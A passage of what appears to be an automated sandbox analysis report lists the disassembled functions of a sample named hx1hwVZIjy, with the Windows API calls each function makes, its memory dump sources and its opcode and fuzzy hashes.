                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID: 3So
                  • API String ID: 1269201914-1105799393
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F5AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F5B1A5,?), ref: 00F5AF46
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00F5B1EA,?,00000000), ref: 00F5B3C4
                  • GetCPInfo.KERNEL32(00000000,00F5B1EA,?,?,?,00F5B1EA,?,00000000), ref: 00F5B3D7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: 5fc32f5a07db5d49bf43193ac93ae33d9c6b186348928262d056ed00ecfa3725
                  • Instruction ID: 0b6cefdc476a64851072ab8e64a06c5d420e9cf7ec2c9b10c7fd0136af8a2040
                  • Opcode Fuzzy Hash: 5fc32f5a07db5d49bf43193ac93ae33d9c6b186348928262d056ed00ecfa3725
                  • Instruction Fuzzy Hash: 98514771D002059FDB34CF31C8816BABBE5EF41321F18416EDA968B253D739954AFB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F36057: __EH_prolog.LIBCMT ref: 00F3605C
                    • Part of subcall function 00F3C827: __EH_prolog.LIBCMT ref: 00F3C82C
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C86F
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C893
                  • new.LIBCMT ref: 00F313FE
                    • Part of subcall function 00F3B07D: __EH_prolog.LIBCMT ref: 00F3B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 60b96f1498cc64618d10e639eb852c3a2efa9a91cb6d09401711a6c325aab5f9
                  • Instruction ID: 5d315757358141704136fe202b917ea9bd14c4435228697a11efcce2cd015690
                  • Opcode Fuzzy Hash: 60b96f1498cc64618d10e639eb852c3a2efa9a91cb6d09401711a6c325aab5f9
                  • Instruction Fuzzy Hash: A44156B0805B409EE724DF7988859E7FBE5FF18310F404A2ED6EE83282CB766554CB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F31385
                    • Part of subcall function 00F36057: __EH_prolog.LIBCMT ref: 00F3605C
                    • Part of subcall function 00F3C827: __EH_prolog.LIBCMT ref: 00F3C82C
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C86F
                    • Part of subcall function 00F3C827: new.LIBCMT ref: 00F3C893
                  • new.LIBCMT ref: 00F313FE
                    • Part of subcall function 00F3B07D: __EH_prolog.LIBCMT ref: 00F3B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: ce879f9702771ce0b89d83bb12c41be17013efc64463724c4d59e7a429f31e1f
                  • Instruction ID: c10f6a719dc6a30c47b2ff4708f34500a7760d15480b24f38126f2b109f6b1b0
                  • Opcode Fuzzy Hash: ce879f9702771ce0b89d83bb12c41be17013efc64463724c4d59e7a429f31e1f
                  • Instruction Fuzzy Hash: 2A4146B0805B409EE724DF7988859E7FBE5FF19310F444A2ED6EE83282CB762554DB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F58FA5: GetLastError.KERNEL32(?,00F70EE8,00F53E14,00F70EE8,?,?,00F53713,00000050,?,00F70EE8,00000200), ref: 00F58FA9
                    • Part of subcall function 00F58FA5: _free.LIBCMT ref: 00F58FDC
                    • Part of subcall function 00F58FA5: SetLastError.KERNEL32(00000000,?,00F70EE8,00000200), ref: 00F5901D
                    • Part of subcall function 00F58FA5: _abort.LIBCMT ref: 00F59023
                    • Part of subcall function 00F5B2AE: _abort.LIBCMT ref: 00F5B2E0
                    • Part of subcall function 00F5B2AE: _free.LIBCMT ref: 00F5B314
                    • Part of subcall function 00F5AF1B: GetOEMCP.KERNEL32(00000000,?,?,00F5B1A5,?), ref: 00F5AF46
                  • _free.LIBCMT ref: 00F5B200
                  • _free.LIBCMT ref: 00F5B236
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: f31b875b0a97d4f96f4beda3a5fef353f8ce3096b230bdd6a3bc9de4af9e214f
                  • Instruction ID: d112f715a8c583a9bf16c6a1cc00a0790a990eaa6cc96b781ac48d5f48d9de10
                  • Opcode Fuzzy Hash: f31b875b0a97d4f96f4beda3a5fef353f8ce3096b230bdd6a3bc9de4af9e214f
                  • Instruction Fuzzy Hash: 35310A32D04208AFDB11EF69C841B6D77F1EF40372F254099EE149B291EB755D4AEB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F39EDC,?,?,00F37867), ref: 00F397A6
                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F39EDC,?,?,00F37867), ref: 00F397DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 9bbe57b6e3085d76978255604f6ba3bd25a560ba1391f4729e2fff1c6f4eaf09
                  • Instruction ID: a531d61b0cfa577f68744c411e762b1c53fa4815cd85515c1cf51d725c7008a8
                  • Opcode Fuzzy Hash: 9bbe57b6e3085d76978255604f6ba3bd25a560ba1391f4729e2fff1c6f4eaf09
                  • Instruction Fuzzy Hash: EA21E671514748AEE7308F24CC85BA7BBE8EB49774F00491DF5E5821D1C3F4AC49AA61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F37547,?,?,?,?), ref: 00F39D7C
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F39E2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$BuffersFlushTime
                  • String ID:
                  • API String ID: 1392018926-0
                  • Opcode ID: 7bacc32d9baf7f79977749a617e1a119bfeee05c5fad746bf6b5a86a118b35a7
                  • Instruction ID: 16bdf8c01b7c0ac99494419bbb58edcf63bfa4444f27a615c19fef062bd2b1b2
                  • Opcode Fuzzy Hash: 7bacc32d9baf7f79977749a617e1a119bfeee05c5fad746bf6b5a86a118b35a7
                  • Instruction Fuzzy Hash: AE21E73154C246ABC714DF24C852EABBBE4AF95728F04081CF8D1C7141D7A9DE0CEBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcAddress.KERNEL32(00000000,00F63958), ref: 00F5A4B8
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F5A4C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: da264060501e8117c306a04e65fcd63df824fdcc3e0b5a3931ead5e7f17a7605
                  • Instruction ID: 76f3de0cf176b37affe67c9f4d59e26d684aa19277336e02e371eb4ebd12adfd
                  • Opcode Fuzzy Hash: da264060501e8117c306a04e65fcd63df824fdcc3e0b5a3931ead5e7f17a7605
                  • Instruction Fuzzy Hash: 09113A37E101255B9F21DEA8EC4496A7391AB813317164320FF25EB274EA70DC15F6D2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00F39B35,?,?,00000000,?,?,00F38D9C,?), ref: 00F39BC0
                  • GetLastError.KERNEL32 ref: 00F39BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 0836b4a07b5a6156ac5eb30ea2ee5741b74508214941a53b6f9f9c64b48808c5
                  • Instruction ID: d45a3b518d776e3dc05bd5241843c43c3eeabe4c252a0c7b826af434b31ff0d9
                  • Opcode Fuzzy Hash: 0836b4a07b5a6156ac5eb30ea2ee5741b74508214941a53b6f9f9c64b48808c5
                  • Instruction Fuzzy Hash: 2401C43270C219DB8B08CF65AC9497EF399AFC5731F14452DF92687290CAF1DE05BA21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00F39E76
                  • GetLastError.KERNEL32 ref: 00F39E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: bf9ea49f9b64aa810accb5b97144d36f1e67c08acc66795fce8ea5503de2da1f
                  • Instruction ID: 279d4a1fd55913d65a031c13d81035447c93b2fdd5daddffef68b4400d838537
                  • Opcode Fuzzy Hash: bf9ea49f9b64aa810accb5b97144d36f1e67c08acc66795fce8ea5503de2da1f
                  • Instruction Fuzzy Hash: F00192727082046BEB34DE69DC4476BB7D99B84334F14893EF156C2680DAF5DC88A620
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _free.LIBCMT ref: 00F58627
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00F70F50,00F3CE57,?,?,?,?,?,?), ref: 00F58663
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Heap$AllocAllocate_free
                  • String ID:
                  • API String ID: 2447670028-0
                  • Opcode ID: 2c344b767d6ab3d488e56b6d151d5936174a7270d4796055a71df7acfd915a68
                  • Instruction ID: 132678f4ae05bef7859ffa7dc80169af8c1d258571beed193143fc96939ed4b2
                  • Opcode Fuzzy Hash: 2c344b767d6ab3d488e56b6d151d5936174a7270d4796055a71df7acfd915a68
                  • Instruction Fuzzy Hash: 22F06232A0151666DB212A25AC01B6F3B689F92BF3F244116FF64B71A1DF34CC0B75A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F5B610: GetEnvironmentStringsW.KERNEL32 ref: 00F5B619
                    • Part of subcall function 00F5B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5B63C
                    • Part of subcall function 00F5B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F5B662
                    • Part of subcall function 00F5B610: _free.LIBCMT ref: 00F5B675
                    • Part of subcall function 00F5B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F5B684
                  • _free.LIBCMT ref: 00F579FD
                  • _free.LIBCMT ref: 00F57A04
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                  • String ID:
                  • API String ID: 400815659-0
                  • Opcode ID: 7182bde087eea26267c8b29cb5edfc5695149199f127ffc0513ce17e7d06f05f
                  • Instruction ID: 2ef1c8ba3350d8dec3be9bca4c6e58b93e4c3100e914813dabb4fdad28e1c401
                  • Opcode Fuzzy Hash: 7182bde087eea26267c8b29cb5edfc5695149199f127ffc0513ce17e7d06f05f
                  • Instruction Fuzzy Hash: 79E0E55390D64301EB62B33A3C0665F26049B82333B101766FF11DB0C2CE28890F30A6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?), ref: 00F40915
                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F4091C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1231390398-0
                  • Opcode ID: 58e7f89d594da40632a5dbac5a82844e6d26cd18450de25811bf6c83ce388060
                  • Instruction ID: bc81cbd45ad5c1580794f1a3d660ca32c6c1c8a3e5a08935e72801f5bbd2af6b
                  • Opcode Fuzzy Hash: 58e7f89d594da40632a5dbac5a82844e6d26cd18450de25811bf6c83ce388060
                  • Instruction Fuzzy Hash: E2E09232E14109BBEF09CAA49C049BB7B9DEB08228720417DEE17D3301FE30DE05A6A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A458
                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F3A27A,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A489
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: c3395235846c411a0e82498c7f5fd751f872f9b55eed08e101991ad396fd7a67
                  • Instruction ID: 649ddb9b1277dfd3b2e1bce084f5ccb53bd32cf4693a6cd1614d6b3f62bf7c39
                  • Opcode Fuzzy Hash: c3395235846c411a0e82498c7f5fd751f872f9b55eed08e101991ad396fd7a67
                  • Instruction Fuzzy Hash: C8F0A03124020DBBDF129F60DC05FE93B6CBB043A5F048055FC8886161DBB68AA8BA50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemText_swprintf
                  • String ID:
                  • API String ID: 3011073432-0
                  • Opcode ID: 4c070bceaed230d8151a08a596bf64b4178c4bf7b81405ed6cc889d5cf563695
                  • Instruction ID: d8f0b4c7e10b58d0892f7c8c02b1dda45b9bc041cb7533eeab097830b90cab34
                  • Opcode Fuzzy Hash: 4c070bceaed230d8151a08a596bf64b4178c4bf7b81405ed6cc889d5cf563695
                  • Instruction Fuzzy Hash: 03F0EC7154034C7AEB11EF709C06FA93F5CEB04745F040556BB04530A1DD756A607762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • DeleteFileW.KERNELBASE(?,?,?,00F3984C,?,?,00F39688,?,?,?,?,00F61FA1,000000FF), ref: 00F3A13E
                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00F3984C,?,?,00F39688,?,?,?,?,00F61FA1,000000FF), ref: 00F3A16C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: cbb65a4ea551b9ee87218ce85d93887b3265dfb11004a37cf614af8134fb1104
                  • Instruction ID: baac49517d06ba538627f9140a9f715ffaa1db1ccfe8cca4011bc3f8bed1f2ed
                  • Opcode Fuzzy Hash: cbb65a4ea551b9ee87218ce85d93887b3265dfb11004a37cf614af8134fb1104
                  • Instruction Fuzzy Hash: 36E0923564020C7BEB11AF71DC41FE97B5CBB093A1F484065BD88C3161DB629D98BE90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00F61FA1,000000FF), ref: 00F4A3D1
                  • OleUninitialize.OLE32(?,?,?,?,00F61FA1,000000FF), ref: 00F4A3D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: GdiplusShutdownUninitialize
                  • String ID:
                  • API String ID: 3856339756-0
